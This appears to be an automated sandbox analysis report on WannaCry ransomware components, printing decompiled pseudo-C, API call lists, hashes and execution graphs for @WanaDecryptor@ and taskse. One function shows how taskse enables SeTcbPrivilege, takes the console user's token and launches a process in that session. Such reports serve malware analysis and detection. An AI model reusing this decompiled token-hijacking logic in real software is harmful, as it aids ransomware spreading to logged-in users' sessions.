                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#641#800
                                  • String ID:
                                  • API String ID: 2580907805-0
                                  • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                  • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00404170(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t12;
                                  				intOrPtr* _t20;
                                  				intOrPtr _t25;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413776);
                                  				_t12 =  *[fs:0x0];
                                  				_push(_t12);
                                  				 *[fs:0x0] = _t25;
                                  				_v20 = __ecx;
                                  				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                  				_v4 = 0;
                                  				_t20 = __ecx + 0x48;
                                  				_v16 = _t20;
                                  				 *_t20 = 0x415c00;
                                  				_v4 = 3;
                                  				L00412D52();
                                  				 *_t20 = 0x415bec;
                                  				_v4 = 1;
                                  				L00412CC2();
                                  				_v4 = 0;
                                  				L00412CC2();
                                  				_v4 = 0xffffffff;
                                  				L00412D94();
                                  				 *[fs:0x0] = _v12;
                                  				return _t12;
                                  			}











                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                  • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#2414#795
                                  • String ID:
                                  • API String ID: 932896513-0
                                  • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                  • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
                                  				intOrPtr* _t18;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t30;
                                  				intOrPtr* _t35;
                                  				intOrPtr* _t37;
                                  				void* _t40;
                                  
                                  				_t1 =  &_a12; // 0x40276a
                                  				_t35 = _a8;
                                  				if(_t35 ==  *_t1) {
                                  					_t16 =  &_a4; // 0x40276a
                                  					_t18 =  *_t16;
                                  					 *_t18 = _t35;
                                  					return _t18;
                                  				} else {
                                  					do {
                                  						_t37 = _t35;
                                  						_t35 =  *_t35;
                                  						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
                                  						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
                                  						_t30 =  *((intOrPtr*)(_t37 + 0xc));
                                  						if(_t30 != 0) {
                                  							_t23 =  *((intOrPtr*)(_t30 - 1));
                                  							if(_t23 == 0 || _t23 == 0xff) {
                                  								_push(_t30 + 0xfffffffe);
                                  								L00412C98();
                                  								_t40 = _t40 + 4;
                                  							} else {
                                  								 *((char*)(_t30 - 1)) = _t23 - 1;
                                  							}
                                  						}
                                  						_push(_t37);
                                  						 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                  						 *((intOrPtr*)(_t37 + 0x10)) = 0;
                                  						 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                  						L00412C98();
                                  						_t40 = _t40 + 4;
                                  						_a8 = _a8 - 1;
                                  					} while (_t35 != _a12);
                                  					_t22 = _a4;
                                  					 *_t22 = _t35;
                                  					return _t22;
                                  				}
                                  			}











                                  APIs
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825
                                  • String ID: j'@
                                  • API String ID: 41483190-370697233
                                  • Opcode ID: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                  • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                  • Opcode Fuzzy Hash: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                  • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t3;
                                  				void* _t4;
                                  
                                  				_t3 = _a4;
                                  				if(_t3 != 0x3e9) {
                                  					if(_t3 == 0x3ea) {
                                  						_t3 =  *((intOrPtr*)(__ecx + 0x820));
                                  						if(_t3 == 0) {
                                  							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
                                  						}
                                  					}
                                  					L00412CBC();
                                  					return _t3;
                                  				} else {
                                  					_t4 = E004076A0(__ecx, 1);
                                  					L00412CBC();
                                  					return _t4;
                                  				}
                                  			}






                                  APIs
                                  • #2379.MFC42 ref: 00407692
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • #2379.MFC42(00000001), ref: 00407667
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$time
                                  • String ID: Wana Decrypt0r 2.0
                                  • API String ID: 2017816395-4201229886
                                  • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                  • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:83.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:56.6%
                                  Total number of Nodes:53
                                  Total number of Limit Nodes:2
                                  execution_graph 115 40154c __set_app_type __p__fmode __p__commode 116 4015bb 115->116 117 4015c3 __setusermatherr 116->117 118 4015cf 116->118 117->118 127 4016b6 _controlfp 118->127 120 4015d4 _initterm __getmainargs _initterm 121 401628 GetStartupInfoA 120->121 123 40165c GetModuleHandleA 121->123 128 401510 __p___argc 123->128 126 401680 exit _XcptFilter 127->120 129 401520 __p___argv 128->129 130 40151b 128->130 133 401420 LoadLibraryA 129->133 130->126 132 401531 132->126 134 401449 GetProcAddress 133->134 135 40143e 133->135 136 401468 GetProcAddress 134->136 137 40145d 134->137 135->132 138 40147a 136->138 141 401485 136->141 137->132 138->132 139 4014a3 139->132 141->139 142 4014e1 Sleep 141->142 143 401000 GetModuleHandleA 141->143 142->139 142->141 144 401064 LoadLibraryA 143->144 145 401079 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 143->145 144->145 146 401405 144->146 145->146 147 4010c2 145->147 146->141 147->146 148 4010e8 GetModuleHandleA 147->148 149 4010f9 LoadLibraryA 148->149 150 40110e GetProcAddress GetProcAddress GetProcAddress 148->150 149->146 149->150 150->146 151 401138 150->151 151->146 152 401149 GetModuleHandleA 151->152 153 40115a LoadLibraryA 152->153 154 40116f GetProcAddress GetProcAddress 152->154 153->146 153->154 154->146 155 40118e 154->155 155->146 156 401196 GetModuleHandleA 155->156 157 4011a5 LoadLibraryA 156->157 158 4011b8 GetProcAddress 156->158 157->146 157->158 158->146 159 4011ca 158->159 160 4011e2 LookupPrivilegeValueA 159->160 161 4011f9 _local_unwind2 159->161 160->161 163 401204 AdjustTokenPrivileges 160->163 161->146 163->161 164 401275 163->164 165 40128b _local_unwind2 164->165 166 4012ab 164->166 165->141 166->161 167 401366 166->167 168 401377 167->168 169 40136b WaitForSingleObject 167->169 172 401398 168->172 169->168 173 40139f 172->173 174 4013e0 AdjustTokenPrivileges 173->174 175 401383 173->175 174->175 175->141 176 40169e _exit

                                  Callgraph

                                  Control-flow Graph

                                  C-Code - Quality: 48%
                                  			E00401000(intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
                                  				int _v8;
                                  				char _v20;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				int _v48;
                                  				signed int _v56;
                                  				int _v60;
                                  				_Unknown_base(*)()* _v68;
                                  				intOrPtr _v72;
                                  				intOrPtr _v76;
                                  				struct _TOKEN_PRIVILEGES _v84;
                                  				signed int _v88;
                                  				_Unknown_base(*)()* _v92;
                                  				_Unknown_base(*)()* _v96;
                                  				_Unknown_base(*)()* _v100;
                                  				_Unknown_base(*)()* _v108;
                                  				signed int _v112;
                                  				char _v116;
                                  				char _v120;
                                  				_Unknown_base(*)()* _v124;
                                  				_Unknown_base(*)()* _v136;
                                  				char _v140;
                                  				struct _LUID _v148;
                                  				long _v152;
                                  				intOrPtr _v156;
                                  				short _v176;
                                  				CHAR* _v216;
                                  				void _v220;
                                  				char _v224;
                                  				long _v228;
                                  				long _v232;
                                  				struct _TOKEN_PRIVILEGES _v240;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t94;
                                  				struct HINSTANCE__* _t101;
                                  				intOrPtr _t107;
                                  				struct HINSTANCE__* _t158;
                                  				struct HINSTANCE__* _t160;
                                  				struct HINSTANCE__* _t161;
                                  				signed int _t162;
                                  				intOrPtr _t165;
                                  				void* _t166;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x402060);
                                  				_push(0x401540);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t165;
                                  				_t166 = _t165 - 0xdc;
                                  				_v60 = 0;
                                  				_v84.PrivilegeCount = 0;
                                  				_v84.Privileges = 0;
                                  				_v76 = 0;
                                  				_v72 = 0;
                                  				_v140 = 0;
                                  				_v120 = 0;
                                  				_v116 = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				_v40 = 0;
                                  				_v36 = 0;
                                  				_t158 = GetModuleHandleA("advapi32.dll");
                                  				if(_t158 != 0) {
                                  					L2:
                                  					_v68 = GetProcAddress(_t158, "OpenProcessToken");
                                  					_v136 = GetProcAddress(_t158, "LookupPrivilegeValueA");
                                  					_v108 = GetProcAddress(_t158, "AdjustTokenPrivileges");
                                  					_v100 = GetProcAddress(_t158, "DuplicateTokenEx");
                                  					_t94 = GetProcAddress(_t158, "CreateProcessAsUserA");
                                  					_v88 = _t94;
                                  					if(_v68 == 0 || _v136 == 0 || _v108 == 0 || _v100 == 0 || _t94 == 0) {
                                  						goto L39;
                                  					} else {
                                  						_t160 = GetModuleHandleA("kernel32.dll");
                                  						if(_t160 != 0) {
                                  							L9:
                                  							_v96 = GetProcAddress(_t160, "WTSGetActiveConsoleSessionId");
                                  							_v92 = GetProcAddress(_t160, "GetCurrentProcess");
                                  							_t94 = GetProcAddress(_t160, "CloseHandle");
                                  							_v56 = _t94;
                                  							if(_v96 == 0 || _v92 == 0 || _t94 == 0) {
                                  								goto L39;
                                  							} else {
                                  								_t161 = GetModuleHandleA("userenv.dll");
                                  								if(_t161 != 0) {
                                  									L14:
                                  									_v124 = GetProcAddress(_t161, "CreateEnvironmentBlock");
                                  									_t94 = GetProcAddress(_t161, "DestroyEnvironmentBlock");
                                  									_v112 = _t94;
                                  									if(_v124 == 0 || _t94 == 0) {
                                  										goto L39;
                                  									} else {
                                  										_t101 = GetModuleHandleA("wtsapi32.dll");
                                  										if(_t101 != 0) {
                                  											L18:
                                  											_t94 = GetProcAddress(_t101, "WTSQueryUserToken");
                                  											_t162 = _t94;
                                  											if(_t162 == 0) {
                                  												goto L39;
                                  											} else {
                                  												_v8 = 0;
                                  												_push(_v92(0x28,  &_v60));
                                  												if(_v68() == 0) {
                                  													L37:
                                  													_push(0xffffffff);
                                  													_t94 =  &_v20;
                                  													_push(_t94);
                                  													goto L38;
                                  												} else {
                                  													_t94 = LookupPrivilegeValueA(0, "SeTcbPrivilege",  &_v148);
                                  													if(_t94 != 0) {
                                  														_v240.PrivilegeCount = 0;
                                  														_v240.Privileges = 0;
                                  														_v232 = 0;
                                  														_v228 = 0;
                                  														_v240.PrivilegeCount = 1;
                                  														_v240.Privileges = _v148.LowPart;
                                  														_v232 = _v148.HighPart;
                                  														_v228 = 2;
                                  														_t94 = AdjustTokenPrivileges(_v60, 0,  &_v240, 0x10,  &_v84,  &_v152);
                                  														if(_t94 != 0) {
                                  															_t107 = _a8;
                                  															if(_t107 != 0xffffffff) {
                                  																_v156 = _t107;
                                  																goto L28;
                                  															} else {
                                  																_t107 = _v96();
                                  																_v156 = _t107;
                                  																if(_t107 != 0xffffffff) {
                                  																	L28:
                                  																	_t94 =  *_t162(_t107,  &_v140); // executed
                                  																	if(_t94 != 0) {
                                  																		_t94 = _v100(_v140, 0x2000000, 0, 1, 1,  &_v120);
                                  																		if(_t94 != 0) {
                                  																			_v224 = 0;
                                  																			memset( &_v220, 0, 0x10 << 2);
                                  																			_t166 = _t166 + 0xc;
                                  																			_v224 = 0x44;
                                  																			_v216 = "winsta0\\default";
                                  																			_v176 = _a12;
                                  																			_push(1);
                                  																			_push(_v120);
                                  																			_push( &_v116);
                                  																			if(_v124() == 0) {
                                  																				goto L37;
                                  																			} else {
                                  																				_push( &_v48);
                                  																				_push( &_v224);
                                  																				_push(0);
                                  																				_push(_v116);
                                  																				_push(0x400);
                                  																				_push(0);
                                  																				_push(0);
                                  																				_push(0);
                                  																				_push(0);
                                  																				_push(_a4);
                                  																				_push(_v120);
                                  																				if(_v88() == 0) {
                                  																					goto L37;
                                  																				} else {
                                  																					if(_a16 != 0) {
                                  																						WaitForSingleObject(_v48, 0xffffffff);
                                  																					}
                                  																					_v8 = 0xffffffff;
                                  																					E00401398(0);
                                  																					 *[fs:0x0] = _v20;
                                  																					return 0;
                                  																				}
                                  																			}
                                  																		} else {
                                  																			_push(0xffffffff);
                                  																			_push( &_v20);
                                  																			goto L38;
                                  																		}
                                  																	} else {
                                  																		_push(0xffffffff);
                                  																		_push( &_v20);
                                  																		goto L38;
                                  																	}
                                  																} else {
                                  																	_push(_t107);
                                  																	_push( &_v20);
                                  																	L00401546();
                                  																	 *[fs:0x0] = _v20;
                                  																	return 0;
                                  																}
                                  															}
                                  														} else {
                                  															_push(0xffffffff);
                                  															_push( &_v20);
                                  															goto L38;
                                  														}
                                  													} else {
                                  														_push(0xffffffff);
                                  														_push( &_v20);
                                  														L38:
                                  														L00401546();
                                  														goto L39;
                                  													}
                                  												}
                                  											}
                                  										} else {
                                  											_t94 = LoadLibraryA("wtsapi32.dll");
                                  											if(_t94 == 0) {
                                  												goto L39;
                                  											} else {
                                  												goto L18;
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									_t94 = LoadLibraryA("userenv.dll"); // executed
                                  									_t161 = _t94;
                                  									if(_t161 == 0) {
                                  										goto L39;
                                  									} else {
                                  										goto L14;
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							_t94 = LoadLibraryA("kernel32.dll");
                                  							_t160 = _t94;
                                  							if(_t160 == 0) {
                                  								goto L39;
                                  							} else {
                                  								goto L9;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t94 = LoadLibraryA("advapi32.dll"); // executed
                                  					_t158 = _t94;
                                  					if(_t158 == 0) {
                                  						L39:
                                  						 *[fs:0x0] = _v20;
                                  						return _t94 | 0xffffffff;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}















































                                  0x00401104
                                  0x00401108
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401108
                                  0x004010f7
                                  0x00401064
                                  0x00401069
                                  0x0040106f
                                  0x00401073
                                  0x00401405
                                  0x0040140b
                                  0x00401418
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401073

                                  APIs
                                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,?), ref: 00401058
                                  • LoadLibraryA.KERNELBASE(advapi32.dll), ref: 00401069
                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00401085
                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 00401090
                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040109E
                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004010A9
                                  • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserA), ref: 004010B4
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004010ED
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004010FE
                                  • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 00401114
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0040111F
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 0040112A
                                  • GetModuleHandleA.KERNEL32(userenv.dll), ref: 0040114E
                                  • LoadLibraryA.KERNELBASE(userenv.dll), ref: 0040115F
                                  • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00401175
                                  • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00401180
                                  • GetModuleHandleA.KERNEL32(wtsapi32.dll), ref: 0040119B
                                  • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 004011AA
                                  • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 004011BE
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 004011EF
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00401263
                                  • _local_unwind2.MSVCRT ref: 004013FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: AddressProc$HandleLibraryLoadModule$AdjustLookupPrivilegePrivilegesTokenValue_local_unwind2
                                  • String ID: AdjustTokenPrivileges$CloseHandle$CreateEnvironmentBlock$CreateProcessAsUserA$DestroyEnvironmentBlock$DuplicateTokenEx$GetCurrentProcess$LookupPrivilegeValueA$OpenProcessToken$SeTcbPrivilege$WTSGetActiveConsoleSessionId$WTSQueryUserToken$advapi32.dll$kernel32.dll$userenv.dll$wtsapi32.dll
                                  • API String ID: 991275522-4095908470
                                  • Opcode ID: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                  • Instruction ID: a8daa8c7751dfcdc06dbaee4ace7374b5f05fd79cd89a88388c8f82615ea9d1e
                                  • Opcode Fuzzy Hash: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                  • Instruction Fuzzy Hash: 07A13E71D002599BDB20DFA58C84BAEBBB8FB48711F10467FE519B72D0E77449418F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 89 401398-40139d 90 4013a7 89->90 91 40139f-4013a5 89->91 92 4013aa-4013af 90->92 91->92 94 4013b1 92->94 95 4013b4-4013b9 92->95 94->95 96 4013c2-4013c7 95->96 97 4013bb-4013bf 95->97 98 4013c9 96->98 99 4013cc-4013d4 96->99 97->96 98->99 100 4013d6 99->100 101 4013d9-4013de 99->101 100->101 103 4013e0-4013f3 AdjustTokenPrivileges 101->103 104 4013f6 101->104 103->104
                                  APIs
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,00401383), ref: 004013EA
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                  • Instruction ID: c5c4706423aeddcfda8965a2f2378707b10bac3de658310f62e01f4fd8324524
                                  • Opcode Fuzzy Hash: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                  • Instruction Fuzzy Hash: 970146B5E10259ABDF10DAE8DCC49AEBBBDAB08304F54482AF905F7650C7789C848B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 80%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr* _t23;
                                  				intOrPtr* _t24;
                                  				void* _t27;
                                  				void _t29;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t55;
                                  				intOrPtr _t58;
                                  				intOrPtr _t61;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x402070);
                                  				_push(0x401540);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_v28 = _t58 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);
                                  				 *0x4031b4 =  *0x4031b4 | 0xffffffff;
                                  				 *0x4031b8 =  *0x4031b8 | 0xffffffff;
                                  				_t23 = __p__fmode();
                                  				_t46 =  *0x4031b0; // 0x0
                                  				 *_t23 = _t46;
                                  				_t24 = __p__commode();
                                  				_t47 =  *0x4031ac; // 0x0
                                  				 *_t24 = _t47;
                                  				 *0x4031bc = _adjust_fdiv;
                                  				_t27 = E004016CB( *_adjust_fdiv);
                                  				_t61 =  *0x4031a0; // 0x1
                                  				if(_t61 == 0) {
                                  					__setusermatherr(E004016C8);
                                  				}
                                  				E004016B6(_t27);
                                  				_push(0x40300c);
                                  				_push(0x403008);
                                  				L004016B0();
                                  				_t29 =  *0x4031a8; // 0x0
                                  				_v112 = _t29;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x4031a4,  &_v112);
                                  				_push(0x403004);
                                  				_push(0x403000);
                                  				L004016B0();
                                  				_t55 =  *_acmdln;
                                  				_v120 = _t55;
                                  				if( *_t55 != 0x22) {
                                  					while( *_t55 > 0x20) {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				} else {
                                  					do {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  						_t42 =  *_t55;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t55 == 0x22) {
                                  						L6:
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				}
                                  				_t36 =  *_t55;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_t40 = E00401510(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                  				_v108 = _t40;
                                  				exit(_t40); // executed
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L004016AA();
                                  				return _t41;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmp
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                  • Instruction ID: 2b2245ead73f1024077fef078df1cc7ef2642006793b2c968f0509b8df6eedd3
                                  • Opcode Fuzzy Hash: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                  • Instruction Fuzzy Hash: E4417DB1800344AFD7209FA4DE49AAA7FBCAB09711F24063FF541B72E1C7794941CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
